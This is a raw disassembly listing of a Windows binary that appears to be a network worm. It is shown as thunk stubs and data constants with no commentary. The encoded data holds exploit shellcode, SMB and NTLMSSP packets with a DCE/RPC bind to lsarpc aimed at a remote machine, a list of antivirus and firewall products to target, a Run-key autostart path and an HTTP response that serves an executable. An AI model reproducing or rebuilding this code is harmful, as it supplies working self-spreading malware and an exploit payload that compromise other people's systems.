db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408A5 proc near ; CODE XREF: .data:0043F1FF�p
jmp dword ptr ds:loc_405366+2
sub_4408A5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408B1 proc near ; CODE XREF: .data:0043FE0E�p
; .data:0043FE48�p ...
jmp dword ptr ds:loc_40536B+1
sub_4408B1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408BD proc near ; CODE XREF: .data:0043F22A�p
jmp dword ptr ds:loc_40536B+5
sub_4408BD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408C9 proc near ; CODE XREF: sub_43F725+B2�p
; sub_43F725+D0�p ...
jmp dword ptr ds:loc_405372+2
sub_4408C9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408D5 proc near ; CODE XREF: sub_43F725+16D�p
; sub_43F725+2E4�p ...
jmp dword ptr ds:loc_405372+6
sub_4408D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408E1 proc near ; CODE XREF: .data:0043F180�p
jmp dword ptr ds:loc_405379+3
sub_4408E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408ED proc near ; CODE XREF: sub_43F624:loc_43F64D�p
; sub_43F624:loc_43F6A7�p ...
jmp dword ptr ds:loc_40537F+1
sub_4408ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408F9 proc near ; CODE XREF: .data:0043F139�p
; .data:0043F153�p ...
jmp dword ptr ds:loc_40537F+5
sub_4408F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440905 proc near ; CODE XREF: .data:0043F43F�p
; sub_43F624+F4�p ...
jmp dword ptr ds:loc_405385+3
sub_440905 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440911 proc near ; CODE XREF: .data:0043FDD2�p
jmp dword ptr ds:loc_405385+7
sub_440911 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44091D proc near ; CODE XREF: sub_43F239+6B�p
; sub_43F239+8E�p ...
jmp dword ptr ds:loc_40538F+1
sub_44091D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440929 proc near ; CODE XREF: sub_4405FD+17�p
jmp dword ptr ds:loc_40538F+5
sub_440929 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440935 proc near ; CODE XREF: .data:0043F3F0�p
; .data:0043F40C�p
jmp dword ptr ds:loc_405396+2
sub_440935 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h
dd 8FFFFh, 10B8h, 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h
db 2 dup(0)
word_4421BE dw 817Ch ; DATA XREF: sub_40399B+19�o
db 0
byte_4421C1 db 0 ; DATA XREF: sub_403A5F+17�o
aI? db '`i/=?<',0 ; DATA XREF: sub_403A5F+44�o
aGas6l db 'GS6l',0 ; DATA XREF: sub_403A5F+88�o
dword_4421CF dd 203868h aMt@6 db 'mt@~6',0 ; DATA XREF: sub_403A5F+DD�o
aWGz db 'w-gz',0 ; DATA XREF: sub_403A5F+FC�o
aBdvq db '!dvq#',0 ; DATA XREF: sub_403BE7+17�o
word_4421E5 dw 80h ; DATA XREF: sub_403BE7+125�r
aDdbl db 'Ddl',0 ; DATA XREF: sub_403BE7+14C�o
dword_4421EC dd 817430h a1dy db ' /1dY',0 ; DATA XREF: sub_403BE7+239�o
dword_4421F6 dd 39324Ah align 4
dd 7, 0Ah
dword_442204 dd 0 ; sub_404020:loc_404007�r ...
word_442208 dw 58h ; DATA XREF: sub_40406B+15�r
aRMqq db '`R#MqQ',0 ; DATA XREF: sub_4040AA+56�o
byte_442211 db 7Fh, 2Fh, 69h ; DATA XREF: sub_4040AA+8C�o
dd 733B26h
byte_442218 db 3Dh, 36h, 0 ; DATA XREF: sub_4040AA+160�o
a99a db '-; 99a',0 ; DATA XREF: sub_4040AA+1A0�o
dword_442222 dd 505866h align 4
dd 6, 0Eh
dword_442230 dd 0 ; .text:loc_404372�r ...
dword_442234 dd 0 ; sub_4043CA+49�r ...
dword_442238 dd 817Ch, 4, 0Ahdword_442244 dd 0 ; sub_404491:loc_4044BF�r ...
byte_442248 db 0 ; DATA XREF: sub_404529+2B�o
byte_442249 db 0 ; DATA XREF: sub_40470D+9�o
aKCivm db 'K CiM ',0 ; DATA XREF: sub_40481B+31�o
aByqv db 'BYQV',0 ; DATA XREF: sub_40481B+F1�o
a4lk db '&*4LK',0 ; DATA XREF: sub_40481B+158�o
dword_44225D dd 726254h dword_442261 dd 2B542Ch byte_442265 db 52h, 72h, 53h ; DATA XREF: sub_404B85-3C�o
dd 517F60h
aRmU db ': &rm`U',0 ; DATA XREF: sub_404B85+7D�o
dd 6
dword_442278 dd 0Ch ; sub_40506F+79�r
dword_44227C dd 0 ; sub_404E2A:loc_404E60�r ...
dword_442280 dd 354B5Eh aO68_0 db 'o6,%8',0 ; DATA XREF: sub_404EC6+138�o
word_44228A dw 7F70h ; DATA XREF: sub_40506F+C�o
db 0
aGK db '`G k',0 ; DATA XREF: sub_40506F+24�o
asc_442292 db '> `h',0 ; DATA XREF: sub_40506F+B7�o
align 4
dw 7
unicode 0, <>,0
dword_44229C dd 11h ; sub_4054C8+149�r ...
dword_4422A0 dd 0 ; sub_405138:loc_40515F�r ...
dword_4422A4 dd 0 aDpVB db '>Dp+',27h,'B',0 ; DATA XREF: sub_40523D:loc_405263�o
aB_mxkw db 'B_mxkw&',0 ; DATA XREF: sub_40523D+11E�o
word_4422B8 dw 4Dh ; DATA XREF: sub_4054C8+5B�r
aQcfdx db 'QcfdX',27h,0 ; DATA XREF: sub_4054C8+FB�o
aNy db 'NY',0 ; DATA XREF: sub_4054C8+10E�o
dword_4422C4 dd 7F3A3Fh byte_4422C8 db 67h, 4Eh, 0 ; DATA XREF: sub_4054C8+1B0�o
dword_4422CB dd 615920h a70cg db '70cg',0 ; DATA XREF: sub_4054C8+277�o
byte_4422D4 db 0 ; DATA XREF: sub_4054C8+3B7�o
word_4422D5 dw 45h ; DATA XREF: sub_4054C8+3DA�r
byte_4422D7 db 49h ; DATA XREF: sub_4054C8+54A�o
dd 60547F6Fh
db 74h, 0
a9jm6N db 27h,'9jM6 N',0 ; DATA XREF: sub_4054C8+588�o
aG db '>',0 ; DATA XREF: sub_4054C8+71B�o
a0A db '0 ,a',0 ; DATA XREF: sub_4054C8+7FF�o
word_4422EE dw 79h ; DATA XREF: sub_4054C8+83B�r
byte_4422F0 db 20h, 31h, 0 ; DATA XREF: sub_4054C8+8CD�o
byte_4422F3 db 62h ; DATA XREF: sub_405E88+1A�o
db 38h, 0
aZ0y db ',`z:0Y',0 ; DATA XREF: sub_405E88+2D�o
aNw db 'Nw ',0 ; DATA XREF: sub_405E88+A7�o
aAy db ' ay+',0 ; DATA XREF: sub_405E88+154�o
word_442308 dw 68h ; DATA XREF: sub_405E88:loc_4060A2�r
dword_44230A dd 784973h aQa@ db '*Q@ ',0 ; DATA XREF: sub_405E88+2F9�o
aIJ db '%i J',0 ; DATA XREF: sub_4061F7+12�o
dword_442319 dd 646942h aS?xv db 'S?XV',0 ; DATA XREF: sub_4061F7+39�o
aDFY db 'D/f',27h,'Y',0 ; DATA XREF: sub_4061F7+121�o
a6l db '6l',0 ; DATA XREF: sub_4061F7+141�o
byte_44232B db 7Fh ; DATA XREF: sub_4061F7+16C�o
aNr db ' *nR',0
dword_442331 dd 372A7Ch byte_442335 db 3Eh, 82h, 0 ; DATA XREF: sub_4061F7+207�o
aEnoX db 'Eno$#X',0 ; DATA XREF: sub_4061F7+23D�o
a231w db '231w-',0 ; DATA XREF: sub_4061F7+278�o
aR2Oe@ db 'r2#Oe%@',0 ; DATA XREF: sub_4061F7+296�o
dword_44234D dd 714B37h dword_442351 dd 533320h aCurh db '`CuRH',0 ; DATA XREF: sub_4061F7+447�o
aC db 'c ',0 ; DATA XREF: sub_4061F7+49B�o
align 10h
dd 4
dword_442364 dd 0Dh dword_442368 dd 0 ; sub_406815:loc_40684B�r ...
dword_44236C dd 0 ; sub_406A40+34�r ...
dword_442370 dd 0 ; sub_406911+17�r ...
dword_442374 dd 0FFFFh ; sub_406A40+137�r ...
aWrIo db ' -wR`iO',0 ; DATA XREF: sub_406911+25�o
dword_442380 dd 496E20h aCsbS db 'cSB>s',0 ; DATA XREF: sub_40696D+6A�o
dword_44238A dd 657451h word_44238E dw 4124h ; DATA XREF: sub_406A40+85�o
dd 4C494F7Fh
db 6Ch, 0
word_442396 dw 5F30h ; DATA XREF: sub_406A40+DB�o
dd 507F66h
dword_44239C dd 4A2F7F41h, 4Fhdword_4423A4 dd 8 ; sub_406D2E+F14�r ...
dword_4423A8 dd 12h dword_4423AC dd 0 ; sub_406CA2:loc_406CCF�r ...
dword_4423B0 dd 1 ; sub_407F07+23�o
byte_4423B4 db 0 ; DATA XREF: sub_406D2E+FD9�r
align 2
aObw8 db 'oW8',0 ; DATA XREF: sub_406D2E+19B�o
dword_4423BB dd 6D3520h aQungz db 'QUnZ',0 ; DATA XREF: sub_406D2E+1FD�o
aKxafL db 'KxAf+/L',0 ; DATA XREF: sub_406D2E+282�o
dword_4423CD dd 24614Dh dword_4423D1 dd 2C5E40h a4yk3 db '4Yk3',0 ; DATA XREF: sub_406D2E+3D2�o
aB db '~',0 ; DATA XREF: sub_406D2E+492�o
aZrsh db 'ZRSH',0 ; DATA XREF: sub_406D2E+4AD�o
aTxnve db 'TxNe',0 ; DATA XREF: sub_406D2E+51F�o
word_4423E8 dw 72h ; DATA XREF: sub_406D2E+535�r
aK80vdo db 'k80Do',0 ; DATA XREF: sub_406D2E+548�o
a8vs db '8VS^&',0 ; DATA XREF: sub_406D2E+5CC�o
dword_4423F7 dd 277C80h word_4423FB dw 38h ; DATA XREF: sub_406D2E+A31�r
aLbn?b db 'lbn?',0 ; DATA XREF: sub_406D2E+A44�o
byte_442403 db 0 ; DATA XREF: sub_406D2E+AA4�o
asc_442404 db 'h<',0 ; DATA XREF: sub_406D2E+B8F�o
byte_442407 db 0 ; DATA XREF: sub_406D2E+C1F�o
dword_442408 dd 2D2079h byte_44240C db 0 ; DATA XREF: sub_406D2E+CF6�o
a1o8qz db '1o8QZ',0 ; DATA XREF: sub_406D2E+D1A�o
aKbX0 db 'k*x0',0 ; DATA XREF: sub_406D2E+DBB�o
word_442419 dw 20h ; DATA XREF: sub_406D2E+E00�r
aJvjm db 'JvjM ',0 ; DATA XREF: sub_406D2E+E5B�o
dword_442421 dd 3B4B20h aG5ah db 27h,'G5aH',0 ; DATA XREF: sub_406D2E+1001�o
byte_44242B db 0 ; DATA XREF: sub_406D2E+10B4�o
dword_44242C dd 0FFFFFFFFh, 407ED9h, 407EE4hdword_442438 dd 0 dd 8
dword_442440 dd 12h dword_442444 dd 0 ; sub_407FBC:loc_407FE9�r ...
aQKy db '~Q ky',0 ; DATA XREF: sub_408048+21A�o
